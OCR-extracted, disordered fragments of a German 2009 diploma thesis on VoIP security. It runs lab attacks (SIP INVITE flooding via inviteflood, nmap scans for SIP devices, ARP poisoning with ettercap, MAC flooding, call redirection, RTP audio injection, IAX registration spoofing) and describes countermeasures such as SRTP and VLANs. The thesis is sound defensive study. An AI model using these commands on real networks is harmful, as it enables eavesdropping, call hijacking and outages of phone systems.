Icon zu starten Wichtig ist dass der Promiscuous Mode nicht ausgeschaltet wird denn sonst werden nur Daten aufgezeichnet welche direkt an den PC MAC Adresse adressiert sind Die eing
197. ein End zu End Protokoll das sowohl im LAN wie auch in VPN Verbindungen eingesetzt werden kann Wichtig dabei ist dass alle an der Kommunikation beteiligten Terminals und VOIP Server SRTP verstehen respektive f r dessen Einsatz entwickelt wurden Der Einsatz von SRTP bietet folgende sicherheitsrelevante Vorteile Verschl sselung der RTP Pakete kein Abh ren der Gespr che mehr m glich Authentifizierung des Absenders Gew hrleistung der Integrit t Verhindert Replay Angriffe auf Terminals Die Pakete in SRTP werden mittels symmetrischem Schl ssel verschl sselt Das heisst zu Beginn einer jeden Session muss ein Schl sselaustausch erfolgen Protokolle wie SIP H 323 und SCCP unterst tzen den Schl sselaustausch Um den Overhead so klein wie m glich zu halten verschl sselt SRTP nicht die IP Header somit sind Informationen wie Sender und Empf ngeradresse immer noch ersichtlich f r den Angreifer Ist dies gew nscht muss IPsec eingesetzt werden SRTP unterst tzt nur RTP basierte Kommunikation und ben tigt ein separates Signalisierungsprotokoll Auf dem Markt gibt es leider immer noch eine Vielzahl Terminals und Applikationen die SRTP nicht unterst tzen Beim Kampf um den tiefsten Preis werden leider zu oft auf Kosten der Sicherheit Einsparungen seitens der Ger tehersteller gemacht Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 190 eo Berner Fachhochschule tee Technik und Informatik S
198. eine End zu End Verteilung der Schl ssel und Sicherheitsparameter zwischen den Kommunikationspartnern 8 3 8 Substandard H 235 8 Schliisselaustausch fiir SRTP ber sichere Siganlisierungskan le H 235 8 bietet ein Schl sselaustauschverfahren ber sichere Kan le wie TLS oder IPSec Das Verfahren soll nicht verwendet werden wenn der sichere Kanal an einem Netzwerkknoten terminiert wird H 235 8 ist fiir den Gebrauch von Punkt zu Punkt Verbindungen beschrankt 8 3 9 Substandard H 235 9 Security Gateway Support H 235 9 wird eingesetzt um die Standards H 235 1 H 235 2 H 235 3 und H 235 5 in Umfeld eines ALG einzusetzen wobei durch dieses einzelne Felder und Adressen ver ndert werden sollen Dabei wird ein ALG im Signalisierungspfad erkannt und diesem auch der Schl ssel zur Authentifizierung bereit gestellt Dadurch kann der ALG notwendige nderungen durchf hren und diese danach authentifizieren 8 4 Massnahmen gegen Angriffe auf RTP Sprachpakete Die Sprachdaten werden unverschl sselt ber UDP im Netzwerk transportiert Die erm glicht es einem Angreifer sehr einfach diese Daten abzuhorchen aufzuzeichnen und als Audiodatei wiederzugeben Mittels Verschl sselung der RTP Pakete oder dem Senden der Daten durch einen sicheren Tunnel kann diesen Angriffen entgegengewirkt werden 84 1 SRTP SRTP Secure Real time Transport Protocol ist spezifiziert in RFC 3711 und bernimmt die Verschl sselung des Medienstroms SRTP ist wie IPsec
199. eine Firewall erg nzen oder auch direkt auf dem zu berwachenden Computersystem laufen und so die Sicherheit von Netzwerken erh hen Integrit t ist auf dem Gebiet der Informationssicherheit ein Schutzziel das besagt dass Daten ber einen bestimmten Zeitraum vollst ndig und unver ndert sein sollen Eine Ver nderung k nnte absichtlich unabsichtlich oder durch einen technischen Fehler auftreten Integrit t umfasst also Datensicherheit Schutz vor Verlust und F lschungssicherheit Schutz vor vors tzlicher Ver nderung IP Spoofing bezeichnet in Computernetzen das Versenden von IP Paketen mit gef lschter Quell IP Adresse 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki Fuzzing http de wikipedia org wiki G 729 http de wikipedia org wiki H 323 G atekeeper http de wikipedia org wiki H 323 http de wikipedia org wiki H 323 http de wikipedia org wiki Hub_ Ne tzwerk http de wikipedia org wiki IAX http www heise de security Route 666 artikel 44824 1 http de wikipedia org wiki Intrusion _Detection_System http de wikipedia org wiki Integrit C3 A4t_ Informationssicherheit http de wikipedia org wiki IP Spoofing S Sch r MAS 06 02 20 Seite 201 IPSec IRDP Spoofing LAND Flood MAC Flooding MAC Spoofing MAC Adresse MD5 MGCP MIDCOM MIKEY Diplomarbeit VOIP Security IPsec Kurzform f r Inter
200. eingesetzten und verbreiteten Signalisierungs und Sprachtransport Protokolle f r VOIP Verbindungen sollen bez glich Sicherheit untersucht und getestet werden Die Arbeit soll keine Zusammenfassung schon bestehender Dokumentationen betreffend VOIP Sicherheit sein welche zur Gen ge im Internet auffindbar sind Es soll vielmehr aufgezeigt werden wie leicht mit welchen frei verf gbaren Tools und Angriffen VOIP Verbindungen abgeh rt respektive manipuliert werden k nnen Das Schwergewicht dieser Arbeit lastet daher im praktischen Einsatz genannter Analyse und Angriffstools gegen die VOIP Sicherheit Die Angriffe sollen gezielt bez glich der bekannten Sicherheitskriterien Verf gbarkeit Integrit t und Vertraulichkeit ausgef hrt und dokumentiert werden Mit dem Erkennen der Schwachstellen sind die dazu erforderlichen sicherheitsrelevanten Gegenmassnahmen zu benennen 2 2 Sollziele Die auszuf hrenden Analysen und Angriffe sollen auf die g ngigsten VOIP Signalisierungs und Medientransport Protokolle angewendet werden Es sind dies namentlich Signalisierungs Protokolle VOIP H 323 Packet based Multimedia Communications Systems ITU T Standard Session Initiation Protocol SIP IETF RFC 3261 Session Description Protocol SDP IETF RFC 4566 Inter Asterisk eXchange Protocl TAX MGCP und Megaco Media gateway Control Protocol H 248 gem Spec ITU T und IETF Medientransport Protokolle VOIP Real Time Transport Protocol R
201. elcher IP Adresse und unter welchem User der angerufene User Agent neu zu erreichen ist Sobald der Anrufende diese Antwort erh lt wird er eine zus tzliche INVITE Nachricht an die ihm soeben mitgeteilte Adresse senden um den Ruf neu aufzubauen Ein Angreifer braucht also nur das Netzwerk nach INVITE Nachrichten abzuhorchen Auf empfangene Nachrichten kann dann mit gespooften Antworten wie zum Beispiel 301 MOVED PERMANENTLY geantwortet werden Wichtig ist dass diese gespoofte Antwort des Attackers schneller ist als die des User Agents an den die INVITE Nachricht gesendet wurde Um dies bewerkstelligen zu k nnen wird das eingesetzte Angriffstool mit maximaler CPU Priorit t ausgef hrt Um dies zu machen muss das Tool unter Linux mit Root Rechten gestartet werden 2 9 3 Ausgangssituation Ablauf und Bedingungen f r Angriff User Agent 4129 ruft User Agent 4119 an Das Angriffstool redirectpoison horcht das Netzwerk ab empf ngt auch die INVITE Nachricht von User Agent 4129 Redirectpoison teilt User Agent 4129 in der gespooften Antwort mit dass User Agent 4119 neu unter User Agent 4111 zu erreichen sei User Agent 4129 baut einen zus tzlichen Anruf zu 4111 auf worauf dieser zu klingeln beginnt User Agent 4119 kriegt von all dem nichts mit und beginnt infolge der erhaltenen original INVITE Nachricht auch zu klingeln Somit rufen beide User Agents gleichzeitig Damit der Angreifer die im Netzwerk ausgetauschten INVITE Nachric
202. elligt das heisst der Switch tr gt sich in seine MAC Tabelle ein an welchem Port sich welche MAC Adresse befindet Die Anzahl Eintr ge die in diese Tabelle gemacht werden k nnen sind mengenm ssig beschr nkt und variieren von Switch zu Switch Beim Angriff versucht der Angreifer diese Tabelle komplett zu f llen indem er sehr viele gef lschte Ethernet Pakete ber diesen Switch sendet Jedes dieser Pakete enth lt eine andere gef lschte MAC Adresse Der Switch wird f r jede neue MAC Adresse die er detektiert einen Eintrag in seiner MAC Tabelle machen Wenn der Speicherplatz dieser Tabelle voll ist kann es sein dass der Switch je nach Hersteller in den Failopen Mode schaltet und als HUB agiert Ab diesem Moment werden alle Datenpakete an alle Ports gesendet und der Angreifer hat sein Ziel erreicht er kann mitlesen 6 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff User Agent 4111 und 4129 sind aktiv miteinander in einem Gespr ch Der Angreifer beabsichtigt dieses Gespr ch mittels eines Wireshark Traces aufzuzeichnen um den Inhalt dieses Gespr ches h ren zu k nnen Damit er die RTP Sprachpakete durch den Switch auch an seinen Port gesendet kriegt flutet er diesen Nach der Installation kann EtherFlood exe auf dem PC des Angreifers aus der Command Line von Windows herausgestartet werden Es muss die aktuelle Netzwerkkarte ausgew hlt werden auf welcher die gef lschten Ethernet Pakete zum Switch gesendet werden sol
203. en Untenstehender Angriff wird gegen den SIP Proxy Server selbst gestartet Zu sehen ist dies an der IP Adresse des Angriffszieles 10 1 1 101 User Agent 999 an welchen via SIP Proxy Server die INVITE Nachrichten gesendet werden sollen ist nicht existent Es spielt keine Rolle ob hier ein existierender oder nicht existierender User Agent eingetragen ist die Nachrichten werden sowieso gem ss IP Adresse des Angriffszieles zum SIP Proxy Server gesendet Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet inviteflood eth0 999 10 1 1 101 10 1 1 101 100000000 Die Argumente im Einzelnen stehen wie folgt f r Inviteflood spricht das Tool an startet es und bergibt nachfolgende Argumente ethO definiert die Schnittstelle tiber welche die Nachricht gesendet werden soll 999 Nummer des User Agents an welchen die INVITE Nachrichten gesendet werden sollen 10 1 1 101 IP Adresse Domain SIP Proxy Server an welchem das Angriffsziel angeschlossen ist 10 1 1 101 IP Adresse des Angriffszieles 100000000 Anzahl INVITE Meldungen die zum Angriffsziel gesendet werden sollen KKK bt inviteflood eth0 999 10 1 1 101 10 1 1 101 100000000 inviteflood Version 2 0 June 09 2006 source IPv4 addr port 10 1 1 107 9 dest IPv4 addr port 10 1 1 101 5060 targeted USER AGENT 999 10 1 1 101 Flooding destination with 100000000 packets sent 5450578 exiting KKK Verhalten des SIP Proxy
204. en ausgetauscht Es werden jeweils die Zust nde des RTP Datenstroms an den Kommunikationspartner gesendet So werden beispielsweise Paket Verlustrate und Jitter mitgeteilt auch ist eine simple Signalisierung mit RTCP m glich Diese Signalisierung ist jedoch infolge der bereits anderen vorhandenen und sehr gut implementierten Signalisierungsportokolle wie SIP TAX H 323 von keiner Wichtigkeit RTCP wird im VOIP Bereich usserst selten eingesetzt und hat somit keine grosse Bedeutung BEMERKUNG Infolge dieses fast nicht eingesetzten Protokolls konnten im Verlaufe dieser Diplomarbeit keine VOIP Anwendungen ermittelt werden welche auf deren Sicherheit getestet h tten werden k nnen Einzig wurde in Kapitel 5 5 1 ein Angriff mittels RTCP ausgef hrt Der Vollst ndigkeit wegen wurde RTCP oben stehend dennoch aufgef hrt obwohl es wie bereits geschrieben absolut bedeutungslos in der VOIP Telefonie ist und dadurch hier eigentlich keinen Platz verdient h tte Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 114 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz http www oxid it cain htm http www wireshark org Linux Unix Umgebung Hinweise zu Installation Verf gbarkeit Beide Tools sind unter Windows lauff hig Wireshark l uft auch in einer Benennung Angriffe Analyse Angriff Analyse gegen 5 2 1 RTP Sniffing Integrit t ER eenneensetseen Vertraulichkeit
205. en die ihnen mitgeteilte ARP Adresse in ihren Cache Somit kann den Empf ngern beispielsweise ein neuer Gateway mitgeteilt werden Aus diesem Grund sollte ARP Gratuitous auf allen Terminals PC s und Servern ausgeschaltet werden Auf Router Schnittstellen ist zudem der Dienst Proxy ARP zu deaktivieren Dies unterbindet gespoofte ARP Eintr ge bei den Angriffszielen wie zum Beispiel den Terminals oder Proxy Servern 8 5 2 Massnahmen gegen MAC Spoofing Neue Switche k nnen gegen MAC Spoofing oder MAC Flooding gesichert werden So kann die maximal akzeptierte Anzahl der MAC Adressen im Switch konfiguriert werden zudem sollte festgelegt werden welche MAC Adressen akzeptiert werden Normalerweise geschieht die Zuordnung der MAC Adresse zum Port in der MAC Tabelle dynamisch das heisst ein PC oder VOIP Terminal funktioniert an jedem Port Statische Eintr ge in der MAC Tabellen verhindern Manipulationen und das Einstecken nicht bekannter Endger te F r die wichtigsten VOIP Komponenten wie Proxy Server Gateways oder Gatekeeper sollten somit statische Eintr ge in der MAC Tabelle gef hrt werden Die Limitierung der Anmeldeversuche der Endger te an den Switch sollte eingeschaltet werden Somit wird festgestellt ob ein sich Angreifer mit einer gespooften MAC Adresse am Switch anmelden will die schon in der MAC Tabelle eingetragen ist In diesem Fall w rde der bestehende Eintrag in der MAC Tabelle berschrieben das urspr ngliche Ger t w re
206. entifier Spanning Tree 0 BPDU Type Configuration 0x00 BPDU flags 0x00 Root Identifier 0 02 1e e5 d5 ec 49 Root Path Cost 0 Bridge Identifier 0 02 1e e5 d5 ec 49 Port identifier 0x8000 Message Age 0 Max Age 20 Hello Time 2 Forward Delay 15 N Untenstehender Wireshark Trace aufgezeichnet auf dem PC des Angreifers zeigt wie mit dem Einsetzen der gespooften BPDU Pakete nach einer Neuberechnung von Spanning Tree die Datenpakete ber den PC des Angreifers gelenkt werden Statt dem vorherigen Pfad nehmen als Beispiel die RTP Pakete jetzt den Pfad ber die Netzwerkbr cke des Angreifers welcher die Daten aufzeichnet und somit in Kenntnis des Gespr chsinhaltes kommt Trace pcap Wiresha Eile Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 207 8 MS NLB PhysServer 30_ Spanning tree for br STP conf ROOT 2 Port 0x8000 30_ Spanning tree for br conf le e5 d5 ec 49 0x8000 30_ Spanning tree for br conf tle e5 d5 ec 4 s 0x8000 183 801413 Dell_f0 22 43 Broadcast who has 10 1 1 Tell 10 1 1 101 183 920298 MS NL8 PhysServer 30_ Spanni conf Root 0 e5 d5 ec 49 Cost 0 0x8000 184 90 M B rver 30_ Spar g for br 0 re5 d5 ec 49 0x8000 185 90 A Server 30_ Spanning tree for br STP 0 02 d5 ec 49 0x8000 186 905302 MS NLB PhysServer 30_ Spanning tree for br STP Conf Root 0 02 1e e5 d5 ec 49 0x8000 ah 9904 3 ks Synopti SONMP SO
207. er folgende Informationen liefern k nnen Offene 5060 Ports welche das Netzwerk abh ren Da 5060 f r SIP definiert ist K nnen somit alle zur Zeit aktiven am Netzwerk angeschlossenen User Agents Hard oder Softphones Registrars Proxy Server und Redirect Server ausfindig gemacht werden 2 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt das Netzwerk 10 1 1 0 24 nach SIP Terminals SIP Proxy Servern Redirect Servern und Registrars zu scannen Nach der Installation von zenmap wird der Angriff mit folgenden Argumenten von deren Command Line aus gestartet nmap sU p5060 10 1 1 0 24 Die Argumente im Einzelnen stehen wie folgt f r nmap Aufruf Tool sU UDP Scan p 5060 Es soll nach offenen 10 1 1 0 24 5060 Ports gescannt werden Das Netzwerk welches gescannt werden soll Bemerkung Die Netzwerkmaske wurde in diesem Angriff bewusst auf 24 gesetzt damit der Scanvorgang nicht das ganze Subnetz 16 scannt Dies wurde aus rein zeitlichen Griinden so gemacht Damit der Angreifer im Netzwerk nach offenen Ports scannen kann braucht er Zugang zum Netzwerk Dies kann lokal vor Ort oder aus der Ferne via Remotezugang sein Einen Remotezugang kann sich der Angreifer mittels Trojaner oder sonstiger Malware schaffen die er zuvor zum Beispiel als E Mail Anhang einem ahnungslosen Benutzer sendet Somit kann er ungeachtet ber einen Rechner ins Netzwerk eindringen und den Angriff g
208. erat studien V oIP voipsec pdf http www voip information de voip mittelstand itu t 2 html http www heise de security Route 666 artikel 44824 1 http www bsi bund de literat studien V oIP index htm Eingesetzte Literatur VOIP Security Eren Detken ISBN 978 3 446 41086 2 Hacking VOIP Himanshu Dwivedi ISBN 978 1 59327 163 3 Hacking VOIP Exposed Endler Collier ISBN 978 0 07 226364 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 198 13 Glossar AES 128 Bit ALG ARP Spoofing Ascotel Asterisk Authentifizierung Autorisierung BackTrack 3 BPDU Pakete Brute Force Cain amp Abel Challenge Response Diplomarbeit VOIP Security Der Advanced Encryption Standard AES ist ein symmetrisches Kryptosystem das als Nachfolger fur DES bzw 3DES im Oktober 2000 vom National Institute of Standards and Technology NIST als Standard bekannt gegeben wurde Nach seinen Entwicklern Joan Daemen und Vincent Rijmen wird er auch Rijndael Algorithmus genannt gesprochen wie dt Reyndahl Application Layer Gateway Erweiterung einer Firewall um die F higkeit Datenpakete der Anwendungsschicht zu verstehen und zu modifizieren ARP Spoofing vom engl to spoof dt t uschen reinlegen oder auch ARP Request Poisoning zu dt etwa Anfrageverf lschung bezeichnet das Senden von gef lschten ARP Paketen Beim ARP Spoofing wird das gezielte Senden von gef lschten ARP Paketen dazu benutzt um di
209. erating system access to a physical CD or DVD drive on the host system Use an ISO Image choose this option to give the guest operating system access to an ISO image residing on the host file system Don t Add a CD DVD Drive Das sich im Ordner C Virtual Machines befindende backTrack3 ISO File bt3 final iso ist mittels Browse auszuw hlen und mit next zu best tigen _ Properties _ Name and Location Guest Operating System Memory and Processors Hard Disk Network Adapter Properties CD DVD Drive In order to access this media a disc must be in the drive specified below and the drive must be connected to your virtual machine If you will use this device to install an operating system you should insert the installation disc before powering on your virtual machine Image File Connect at Power On Yes Virtual Device Node Diplomarbeit VOIP Security Information bt3 final iso 592 927 MS Dec 15 2008 9 ISO Image File standard 19 02 2009 S Sch r MAS 06 02 20 Seite 23 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Damit Logdateien und andere Angriff Tools via USB Stick von und nach Back Track3 kopiert werden k nnen ist ein USB Controller zu installieren und mit next zu best tigen E Create Virtual Machine q USB Controller Name and Location Guest Operating System A USS contro
210. ercap NG 0 7 3 Jargets Hosts View Mitm Filters Logging Plugins Help Start sniffing Ctri w Stop sniffing Ctri E J Target 2 J 10 1 1 101 4 Exit Ctri x Add Delete Add oO hosts added to the hosts list TTT Host 10 1 1 129 added to TARGET1 Host 10 1 1 101 added to TARGET2 ARP poisoning victims GROUP 1 10 1 1 129 00 08 5D 19 93 A7 GROUP 2 10 1 1 101 00 14 22 F0 22 43 Im Tab Connections ist zu sehen dass ein aktiver Datenaustausch zwischen dem User Agent 4129 und den Asterisk Proxy Server stattfindet Auch ist zu sehen dass beide Angriffsziele Pakete senden ettercap NG 0 7 3 Start Targets Hosts View Mitm Filters Logging Plugins Help Host List x Targets Connectio Proto State 10 1 1 101 11108 10 1 1 129 3000 U active 804616 10 1 1 129 3001 0 2243 202 11109 U active 576 View Details Kill Connection Expunge Connections Ing e victims ARP poisoning victims GROUP 1 10 1 1 129 00 08 5D 19 93 A7 GROUP 2 10 1 1 101 00 14 22 F0 22 43 Starting Unified sniffing Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 137 oo Berner Fachhochschule ee Technik und Informatik Software Schule Schweiz Das erstellte Logfile logfileARPPoisoning pcap ist im root von BackTrack 3 zu finden Darin befinden sich die aufgezeichneten Daten welche ber den PC des Angreifers gelenkt wurden
211. erden Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vorkommen auch wenn diese zum Beispiel am Schluss noch mit zwei Zahlen versehen werden z Bsp Spanien08 UNSICHER Sichere Passw rter enthalten Sonderzeichen Gross und Kleinschreibung ergeben keinen Sinn und sind mindestens 8 Zeichen lang Sichere Passw rter stehen auch nicht auf einem Post it Nachrichtenzettel unter dem Telefonieterminal oder der PC Tastatur Klartext Authentifizierung auf dem Asterisk Proxy Server nicht erlauben und ausschalten Siehe Massnahmen Asterisk und Verschl sselung Kapitel 8 2 1 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 88 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 3 32 Technik und Funktionsweise Wireshark ist ein Tool mit welchem Nachrichten aufgezeichnet werden k nnen die ber ein Netzwerk ausgetauscht werden Werden bewusst oder irrt mlicherweise Passw rter und Benutzerkonten in Klartext ber das Netzwerk transportiert so sind diese auch in den aufgezeichneten Daten ersichtlich In falscher Sicherheit w gend oder aus Bequemlichkeit werden heutzutage immer noch sehr viele Passw rter in Klartext ber das Netzwerk ausgetauscht Oft ist der Grund daf r weil eine Implementierun
212. ere Gespr chspartnet l ge sie an was zum Beispiel den aktuellen Schutz gegen Angriff Analyse Siehe Massnahmen SRTP Kapitel 8 4 1 Siehe Massnahmen Tunneln mit IPSec Kapitel 8 4 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 121 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 5 32 Technik und Funktionsweise Der Angreifer h rt den Netzwerkverkehr nach RTP Sprachpaketen ab Sobald sein Angriffsziel aktiv in einem Gespr ch ist kann er rtpmixsound entsprechend konfigurieren und den Angriff starten Dazu muss er den ersnifften momentan gebrauchten Port f r die RTP Sprachpakete und IP Adresse seines Angriffziels im Tool eingeben Zuvor muss das einzuschleusende Audio File in ein bestimmtes Format konvertiert werden dies geschieht mit dem Tool sox exe Sox wurde wie folgt mit untenstehendem Befehl aufgerufen um die bestehende WAV Datei lachen_orig wav in eine neue WAV Datei lachensox wav zu konvertieren kkk C Users stefan Diplomarbeit VoipSec Angriffe RTPmixsound sox 14 2 0 sox 14 2 0 gt sox lachen_orig wav c 1 r 8000 u lachensox wav KKK 5 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff User Agent 4115 und User Agent 4119 sind aktiv miteinander in einem Gespr ch Der Angreifer beabsichtigt in diese Gespr chsverbindung eigene RTP Sprachpakete einzuschleusen
213. erender Angriffstools gegen das jeweilige Protokoll wiederspiegelte SDP und RTCP sind Erweiterungen der bestehenden Protokolle SIP und RTP welche Eigenschaften des Medienstromes respektive die Gespr chsqualit t beschreiben Verf gbare und funktionierende Angriffs Tools welche gezielt diese Subprotokolle ins Visier nehmen wurden keine gefunden vielmehr waren Angriff Tools gegen die weit mehr verbreiteten Protokolle SIP RTP H 323 und IAX auffindbar MGCP ist eine fr here Version von Megaco und hat gegen ber dem sp teren Megaco wesentliche Einschr nkungen Beide Protokolle werden f r Kontrollfunktionen im Master Slave Betrieb der Media Gateways eingesetzt Das Einsatzgebiet der Protokolle ist im Backbone und Fernsprechnetz Diese wegen ihrer Wichtigkeit gut abgesicherten Netzte bieten einem Angreifer in der Regel nicht viele m gliche Angriffspunkte Infolge der fehlenden Infrastruktur und der weniger grossen Verbreitung wurde dieses Protokoll entgegen dem Pflichtenheft nicht getestet und das Augenmerk auf die weit mehr verbreiterten Standard Protokolle von VOIP gerichtet Nach der Klassifizierung und dem Einarbeiten in die zu testenden Protokolle wurden die m glichen Angriffspunkte bestimmt und nach verf gbaren Angriff Tools im Internet gesucht Dabei wurde R cksicht auf m glichst bekannte und weit verbreitete sowie kostenlose Tools genommen Die meisten Tools sind f r Linux UNIX geschrieben und erm glichen einen ganz bestimmten Angriff S
214. erf gbar sind Ei Facevoni01 peap a EP EEE te ee ee g File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Destination Protocol Info 87 27 110291 vmware_55 dd b4 Broadcast ARP who has 10 1 1 101 Tell 10 1 1 111 88 27 110304 Dell_f0 22 43 Vmware_55 dd b4 ARP 10 1 1 101 is at 00 14 22 f0 43 89 27 111892 10 1 1 101 10 1 1 101 TCP epmap gt epma SYN 0 Win 512 Len 0 Frame 89 60 bytes on wire 60 bytes captured Ethernet II Src Vmware_55 dd b4 00 0c 29 55 dd b4 Dst Dell_f0 22 43 00 14 22 f0 22 43 amp Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 101 10 1 1 101 Transmission Control Protocol Src Port epmap 135 Dst Port epmap 135 Seq 0 Len 0 Source port epmap 135 Destination port epmap 135 Sequence number 0 relative sequence number Acknowledgment number Broken TCP The acknowledge field is nonzero while the ACK flag is not set Header length 20 bytes Flags 0x02 SYN Window size 512 Checksum Oxb3b9 correct N Der Windows Task Manager verdeutlicht das Resultat dieses Angriffes Die CPU des Angriffsziels ist zu 100 ausgelastet Das System kann keine normalen Telefonie Funktionen wie das Weiterleiten der RTP Sprachpakete oder Verbindungsanfragen der User Agents ausf hren Die gesamte Telefonieinfrastruktur steht mit dem Ausfall des Asterisk Proxy Servers still Z Windows Task Manager O S lt Anwendungen Proze
215. erk vulnerability Scanner Nmap Portscanner Ohrwurm MitM Attack Tool Registration Adder Tool registriert das SIP Terminal auf dieselbe Adresse wie Zielobjekt Registration Hijacker Tool t uscht SIP REGISTER Meldungen vor in der Absicht alle ankommenden Antwort Meldungen der Clients zum Angreifer weiter zu leiten In diesen Antwort Meldungen stehen die Registrierungsdaten RingAll L sst alle VOIP Endger te klingeln RTP Mixsound Tool welches den Sprachdaten vorgegebene Audiofiles einschleust RTPProxy Sendet RTP Pakete an eine andere Destination Sip send fun SIP Test Tool SIP Tastic Brutforce dictionary Attack Tool fiir SIP Protokoll Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 216 6 Berner Fachhochschule F Technik und Informatik Software Schule Schweiz SIPBomber SIP Protokoll Testtool SIPcrack Mittels Dictionary Angriff werden Registrierungs Passw rter der SIP Clients herausgefunden welche zuvor w hrend Anmeldung in ein Dump File geschrieben wurden SIP Proxy Schaltet sich zwischen Client und PBX ein sehr m chtiges Tool SIPROUGE SIP Proxy welcher zwischen 2 kommunizierenden Usern mith rt SIPSCAN Scannt IP Bereiche nach VOIP Endger ten ab SiVuS Schwachstellen Scanner fiir VOIP Netzwerke welches das SIP Protokoll verwendet Smap Networkscanner spezialisiert auf Suche von VOIP Terminals Spitter Tool zum automatischen Versenden von Telefonwerbung in einem IP Netzwerk UDP RTP Flooder
216. estamp 16 Outbound seq no 1 Inbound seq no 2 amp Type IAx 6 IAx subclass REGREJ 16 Information Element Cause Registration Refused S5 Information Element Hangup cause Facility rejected Ox1d IE id Hangup cause Ox2A Length 1 Hangup cause Facility rejected Ox1d N Retransmission False Gr nde daf r warum bei diesem Angriff das Paket des Angreifers zu sp t beim IAX Client eingetroffen ist sind folgende Vnak wird in einer virtuellen Maschine auf einem PC mit wenig Performance ausgef hrt Somit sind die Detektion eines Registration Requestes REGREO und die Ausf hrung des Angriffes zeitlich verz gert Zum Zeitpunkt des Angriffes lief der Asterisk Proxy Server in Leerlauf In einer normalen Umgebung w re der Asterisk Proxy Server mit weiteren Gespr chsverbindungen und Verbindungsanfragen besch ftigt welche die Reaktionszeit verl ngern w rden In Sachen Rechenleistung sowie RAM Best ckung ist der Asterisk Proxy Servers dem Angreifer PC in dieser Testumgebung weit berlegen 3 6 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Schafft es der Angreifer die gespoofte Registration Reject REGREJ Nachricht an den IAX Client zur ckzu senden bevor dieser die Registration Authentification REGAUTH Nachricht des Asterisk Proxy Servers erh lt verhindert er dessen Registrierung Ohne Registrierung sind weder ankommende noch abgehende Gespr che auf diesem IAX Cl
217. etzwerkes entsprechen durchaus denselben Praktiken wie sie in dieser Arbeit aufgezeigt werden sollen Dazu muss jedoch in der Regel eine weitere Sicherheitsh rde berwunden werden die Firewall Ist diese jedoch einmal berwunden gelten ann hernd dieselben Bedingungen wie intern im LAN Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 214 eo Berner Fachhochschule few Technik und Informatik Software Schule Schweiz 2 3 Kannziele Das Skinny Client Control Protocol SCCP ist ein propriet res Protokoll welches bei Cisco VOIP Systemen zum Einsatz kommt Um Angriffe gegen dieses System fahren zu k nnen m sste zuerst eine entsprechende Testumgebung organisiert und aufgebaut werden k nnen Die Einarbeitungszeit in einen neuen Call Manager ist hoch sollte jedoch die Zeit im Rahmen dieser Diplomarbeit dazu ausreichen wird dieses Protokoll auch analysiert Skype ist ebenfalls ein propriet res Protokoll welches zudem nicht offen gelegt wurde Somit sind dementsprechend Analyse und Angriffe gegen dieses Protokoll sehr schwierig Deshalb wird Skype haupts chlich der Vollst ndigkeit wegen im Diplombericht erw hnt Sollte gen gend Zeit vorhanden sein werden dennoch diverse Attacken und Analysen vollzogen werden Die aus den get tigten Angriffen gegen die PBX Ascotel Intelligate erzielten Erkenntnisse dienen als Grundstein zur Erarbeitung eventueller L sungsvorschl ge Sollten berhaupt sicherheitsrelevante M n
218. fe klingeln beim Angreifer Auch kann der Angreifer abgehende Gespr che mit falscher Identit t f hren Somit k nnen auch Gespr che auf Kosten anderer gef hrt werden Schutz gegen Angriff Analyse Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Vnak bietet noch weitere Tools welche f r Angriffe gegen SIP H 323 und IAX eingesetzt werden k nnen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 93 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 3 5 2 Technik und Funktionsweise Digest Authentification Der Asterisk Proxy Server verlangt eine Registrierung mittels MD5 gehashtem Passwort der IAX Clients Dieses Verfahren ist die meist eingesetzte Authentifizierung bei Asterisk Proxy Servern Auch wenn im Asterisk Proxy Server als Authentifizierungs Methode RSA definiert w re w rde der Einsatz dieses Tools zum Erfolg f hren Das eingesetzte Tool horcht das Netzwerk nach Registrations Requests REGREO der IAX Clients ab welche diese an den Asterisk Proxy Server senden Dabei kann konfiguriert werden ob auf alle Registrations Requests reagiert werden soll oder nur auf diejenigen welche von einer bestimmten IP Adresse her kommen Empfangene Registrations Requests der AX Clients werden sofort mittels einer gespooften Registration Authentication REGAUTH Nachricht beantwortet In dieser Antwort wird dem anfragenden IAX Client mitgeteilt dass als Authent
